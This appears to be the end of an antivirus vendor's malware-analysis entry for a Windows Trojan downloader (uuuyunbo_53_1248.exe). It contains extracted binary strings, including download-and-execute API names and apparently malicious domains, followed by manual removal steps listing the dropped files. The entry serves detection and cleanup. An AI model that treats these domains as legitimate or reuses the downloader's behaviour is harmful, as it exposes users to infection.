%s (unsupported)
%d (unknown)
USER,%s
7[^= ]%*[ =]%5s
Syntax error in telnet option: %s
Unknown telnet option %s
%c%c%c%c%s%c%c
%c%c%c%c
7[^,],7s
%c%s%c%s
WS2_32.DLL
failed to load WS2_32.DLL (%d)
failed to find WSACreateEvent function (%d)
failed to find WSACloseEvent function (%d)
failed to find WSAEventSelect function (%d)
failed to find WSAEnumNetworkEvents function (%d)
WSACreateEvent failed (%d)
WSAEnumNetworkEvents failed (%d)
WSACloseEvent failed (%d)
FreeLibrary(wsock2) failed (%d)
TFTP
set timeouts for state %d; Total %ld, retry %d maxtry %d
got option=(%s) value=(%s)
blksize is larger than max supported
%s (%d)
blksize is smaller than min supported
%s (%ld)
%s (%d) %s (%d)
invalid tsize -:%s:- value in OACK packet
%s%c%s%c
tftp_send_first: internal error
Received last DATA packet block %d again.
Received unexpected DATA packet block %d, expecting block %d
Timeout waiting for block %d ACK. Retries = %d
tftp_rx: internal error
Received ACK for block %d, expecting %d
tftp_tx: giving up waiting for block %d ack
tftp_tx: internal error, event: %i
TFTP finished
bind() failed; %s
TFTP response timeout
LDAP local: LDAP Vendor = %s ; LDAP Version = %d
LDAP local: %s
LDAP local: trying to establish %s connection
LDAP local: Cannot connect to %s:%ld
LDAP local: ldap_simple_bind_s %s
LDAP remote: %s
There are more than %d entries
LOGIN %s %s
AUTHENTICATE %s %s
AUTHENTICATE %s
No known authentication mechanisms supported!
LIST "%s" *
SELECT %s
FETCH %s BODY[%s]<%s>
FETCH %s BODY[%s]
APPEND %s (\Seen) {%I64d}
SEARCH %s
LOGINDISABLED
STARTTLS not supported.
STARTTLS denied. %c
Access denied. %c
IMAPS not supported!
%cd
%s %s
USER %s
APOP %s %s
AUTH %s %s
AUTH %s
STLS not supported.
Authentication failed: %d
PASS %s
POP3S not supported!
SMTP
EHLO %s
HELO %s
MAIL FROM:%s
MAIL FROM:%s AUTH=%s
MAIL FROM:%s AUTH=%s SIZE=%s
MAIL FROM:%s SIZE=%s
RCPT TO:%s
RCPT TO:<%s>
Got unexpected smtp-server response: %d
Remote access denied: %d
Command failed: %d
MAIL failed: %d
RCPT failed: %d
DATA failed: %d
SMTPS not supported!
PORT
Preparing for accepting server on data port
FTP response timeout
FTP response aborted due to select/poll error: %d
CWD %s
getsockname() failed: %s
failed to resolve the address provided to PORT: %s
socket failure: %s
bind(port=%hu) on non-local address failed: %s
bind(port=%hu) failed: %s
bind() failed, we ran out of ports!
%s |%d|%s|%hu|
Failure sending EPRT command: %s
,%d,%d
Failure sending PORT command: %s
Connect data stream passively
PRET %s
PRET STOR %s
PRET RETR %s
REST %d
SIZE %s
%s%s%s
MDTM %s
APPE %s
STOR %s
%c%c%c%u%c
Illegal port number in EPSV reply
%d,%d,%d,%d,%d,%d
Skip %d.%d.%d.%d for data connection, re-use %s instead
Bad PASV/EPSV response: d
Can't resolve proxy host %s:%hu
Can't resolve new host %s:%hu
Failed to do PORT
dddddd
ddd d:d:d GMT
Last-Modified: %s, d %s M d:d:d GMT
unsupported MDTM reply format
Got a d response code instead of the assumed 200
ftp server doesn't support SIZE
RETR %s
Failed FTP upload: 

RETR response: d
PBSZ %d
ACCT %s
Access denied: d
ACCT rejected by server: d
Got a d ftp-server response when 220 was expected
unsupported parameter to CURLOPT_FTPSSLAUTH: %d
PROT %c
Entry path is '%s'
QUOT command failed with d
MKD %s
Failed to MKD dir: d
PRET command not accepted: d
Remembering we are in dir "%s"
Failure sending ABOR command: %s
server did not report OK, got %d
QUOT string not accepted: %s
TYPE %c
Connecting to %s (%s) port %d
ftp_perform ends with SECONDARY: %d
Wildcard - START of "%s"
Wildcard - "%s" skipped by user
Failure sending QUIT command: %s
Uploading to a URL without a file name!
FTPS not supported!
Couldn't open file %s
Can't open %s for writing
Can't get the size of %s
Refusing to issue an RTSP request [%s] without a session ID.
Transport:
Transport: %s
Refusing to issue an RTSP SETUP without a Transport: header.
Range: %s
%s %s RTSP/1.0
Session: %s
%s%s%s%s%s%s
curl
%sAuthorization: Digest %s
%sAuthorization: NTLM %s
SOCKS4 communication to %s:%d
SOCKS4 connect to %s (locally resolved)
Failed to resolve "%s" for SOCKS4 connect.
SOCKS4%s request granted.
Can't complete SOCKS4 connection to %d.%d.%d.%d:%d. (%d), request rejected or failed.
Can't complete SOCKS4 connection to %d.%d.%d.%d:%d. (%d), request rejected because SOCKS server cannot connect to identd on the client.
Can't complete SOCKS4 connection to %d.%d.%d.%d:%d. (%d), request rejected because the client program and identd report different user-ids.
Can't complete SOCKS4 connection to %d.%d.%d.%d:%d. (%d), Unknown.
User was rejected by the SOCKS5 server (%d %d).
SOCKS5 GSSAPI per-message authentication is not supported.
No authentication method was acceptable. (It is quite likely that the SOCKS5 server wanted a username/password, since none was supplied to the server on this connection.)
Failed to resolve "%s" for SOCKS5 connect.
Can't complete SOCKS5 connection to %d.%d.%d.%d:%d. (%d)
Can't complete SOCKS5 connection to %s:%d. (%d)
Can't complete SOCKS5 connection to xx:xx:xx:xx:xx:xx:xx:xx:%d. (%d)
Establish HTTP proxy tunnel to %s:%hu
%s:%hu
%s%s%s:%hu
Host: %s
CONNECT %s HTTP/%s
%s%s%s%s
HTTP/1.%d %d
TUNNEL_STATE switched to: %d
Received HTTP code %d from proxy after CONNECT
.jpeg
.html
; filename="%s"
%s; boundary=%s
Content-Type: multipart/mixed; boundary=%s
Content-Type: %s
couldn't open file "%s"
--%s--
------------------------xx
%c%c==
%c%c%c=
LOGIN
%s/%s
%s xxxxxxxxxxxxxxxx
00000001
xxxx
username="%s",realm="%s",nonce="%s",cnonce="%s",nc="%s",digest-uri="%s",response=%s,qop=%s
%s:%s:%s
%s:%s:x:%s:%s:%s
username="%s", realm="%s", nonce="%s", uri="%s", cnonce="%s", nc=x, qop=%s, response="%s"
username="%s", realm="%s", nonce="%s", uri="%s", response="%s"
%s, opaque="%s"
%s, algorithm="%s"
user=%s
auth=Bearer %s
Unsupported SASL authentication mechanism
0123456789-
NTLMSSP%c
%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%s%s
%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c
1.2.8
deflate 1.2.8 Copyright 1995-2013 Jean-loup Gailly and Mark Adler
inflate 1.2.8 Copyright 1995-2013 Mark Adler
function not supported
operation canceled
address_family_not_supported
operation_in_progress
operation_not_supported
protocol_not_supported
operation_would_block
address family not supported
broken pipe
inappropriate io control operation
not supported
operation in progress
operation not permitted
operation not supported
operation would block
protocol not supported
Visual C   CRT: Not enough memory to complete call to strerror.
Operation not permitted
Inappropriate I/O control operation
Broken pipe
operator
GetProcessWindowStation
curl_global_init failed: %d
Microsoft Windows NT 4.0
Microsoft Windows 95
Microsoft Windows 98
Microsoft Windows Me
Microsoft Windows 2000
Microsoft Windows XP
Microsoft Windows XP Professional x64 Edition
Microsoft Windows Server 2003 Web Edition
Microsoft Windows Server 2003 Compute Cluster Edition
Microsoft Windows Server 2003 Storage Server
Microsoft Windows Server 2003 Datacenter Edition
Microsoft Windows Server 2003 Enterprise Edition
Microsoft Windows Server 2003 R2 Storage Server
Microsoft Windows Vista
Microsoft Windows Server 2008
Microsoft Windows 7
Microsoft Windows Server 2008 R2
EEDTFJDVCLHQJLBOJLDUCLFDJIDVIWCWDUDPCHERBBHHHYDTIPGSFTFVGKCTAYDQIWAFHHERFPGKAYENGPEKHBHICG
EEDTFJDVCLHQJLCHDMGWJUGGEEGNGQFNGYFBFKCNFLITFTBKBMDRIJGYFYIJAUHNIJEBATDIJJIBBECXHOGPJTEKHXJJJOIYJHGJIPBQBOHLFSDNEXEYIRADGREOBVAX
EEDTFJDVCLHQJLCBBIIFHBAEGYDJJIHOGOCVIREVDXJRDHDDCGGSDLDRGQBGHOCIGKBJASICIVGWEBFRHIBGCCCNHSCGAF
EEDTFJDVCLHQJLCHDMGXGUJLCWACAAFYBDJGEICOFTIAHMJGJKGJCVFNIUJGGHAWAIEZBCCOFEAOATEWJHDFAUCTBXIMFODUIXHKDODHIGBLHFGCERIOJUEUDPFEEGHK
EEDTFJDVCLHQJLCFIRCYIVDOGJJGAYENHBASDPCAJMIIIQBKAACHEIJTASGJDKBXIOICEBAMESEEDTFJDVCLHQJLBOJLDUCLFDJIDVIWCWDUDPCHERBBHHHYDTIPGSFTFVGKCTAYDQIWAFHHERFPGKAYENGPEKHBHICG
SELECT * FROM Win32_OperatingSystem
InternetOpenUrlW
HttpQueryInfoW
HttpOpenRequestW
HttpSendRequestW
URLDownloadToFileW
ShellExecuteW
C:\Users\Administrator\Desktop\Q
\Release\nmjh.pdb
WLDAP32.dll
WS2_32.dll
PeekNamedPipe
KERNEL32.dll
USER32.dll
RegOpenKeyExW
RegEnumKeyExW
RegCloseKey
CryptDestroyKey
CryptImportKey
ADVAPI32.dll
ole32.dll
OLEAUT32.dll
IPHLPAPI.DLL
GetCPInfo
GetProcessHeap
zcÁ
];:6,,((()
c.CHauy
v:\OC
w.Rd&
.Yxp6g
.Xui2\y
.Vr{4Yu
3a~D.Yv
.Cv?f
.UvUAf
.UvUBh
.VwUAi
.YyUAq
.YuAO
/F.En
.Wx&O|
&Qs
.Vraz
.Xv
<requestedExecutionLevel level='requireAdministrator' uiAccess='false' />
6 6$6(6,6064686<6@6
5 5$5(5,505
8@8%9U9Z9
0 0$0(0,000
combase.dll
mscoree.dll
- floating point support not loaded
- CRT not initialized
- Attempt to initialize the CRT more than once.
portuguese-brazilian
USER32.DLL
2.cmd
kernel32.dll
Gateway:0.0.0.0
c:\Program Files\
#{ad498944-762f-11d0-8dcb-00c04fc3358c}
wininet.dll
Mozilla/4.0 (compatible)
urlmon.dll
s.tianyuanjyh.com
shell32.dll
VVV.yytv8.com
%d-%d-%d
%d-%d-%d-%d-%d-%d
C:\uuuyunbo_53_1248.exe
1.0.0.1
YunBOWin.exe


Remove it with Ad-Aware

  1. Click (here) to download and install Ad-Aware Free Antivirus.
  2. Update the definition files.
  3. Run a full scan of your computer.


Manual removal*

  1. Terminate malicious process(es) (How to End a Process With the Task Manager):

    uuuyunbo_53_1248.exe:1536
    %original file name%.exe:652

  2. Delete the original Trojan file.
  3. Delete or disinfect the following files created/modified by the Trojan:

    %Program Files%\setup_30004.exe (1930 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\setup_30004[1].exe (4277 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\XxShow\XxTongji.dll (11601 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsx2.tmp\browse.bmp (32 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsx2.tmp\license.txt (11 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsx2.tmp\CheckEnv.dll (2236 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsx2.tmp\close.bmp (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsx2.tmp\System.dll (11 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsx2.tmp\install.bmp (4289 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsx2.tmp\WebCtrl.dll (5 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsx2.tmp\checkbox1.bmp (3 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsx2.tmp\loading1.bmp (25 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsx2.tmp\loading2.bmp (22 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsx2.tmp\go.bmp (4 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsx2.tmp\finish.bmp (5494 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsx2.tmp\checkbox2.bmp (3 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsx2.tmp\nsDialogs.dll (9 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsx2.tmp\install_step01.bmp (14661 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsx2.tmp\SkinBtn.dll (4 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsx2.tmp\install_step.bmp (15065 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsx2.tmp\WndProc.dll (3 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsx2.tmp\BgWorker.dll (2 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsx2.tmp\init.bmp (1568 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsx2.tmp\cancel.bmp (21 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsx2.tmp\bg.bmp (3624 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
    C:\Setup_95101248.exe (7386 bytes)
    C:\uuuyunbo_53_1248.exe (7386 bytes)

  4. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
  5. Reboot the computer.

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.

No votes yet


Lavasoft is the maker of Ad-Aware, the world's most popular anti-malware software with over 450 million downloads.
© 2026 Lavasoft. All rights reserved.
Terms Of Use |   Privacy Policy


x

Our best antivirus yet!

Fresh new look. Faster scanning. Better protection.

Enjoy unique new features, lightning fast scans and a simple yet beautiful new look in our best antivirus yet!

For a quicker, lighter and more secure experience, download the all new adaware antivirus 12 now!

Download adaware antivirus 12
No thanks, continue to lavasoft.com
close x

Discover the new adaware antivirus 12

Our best antivirus yet

Download Now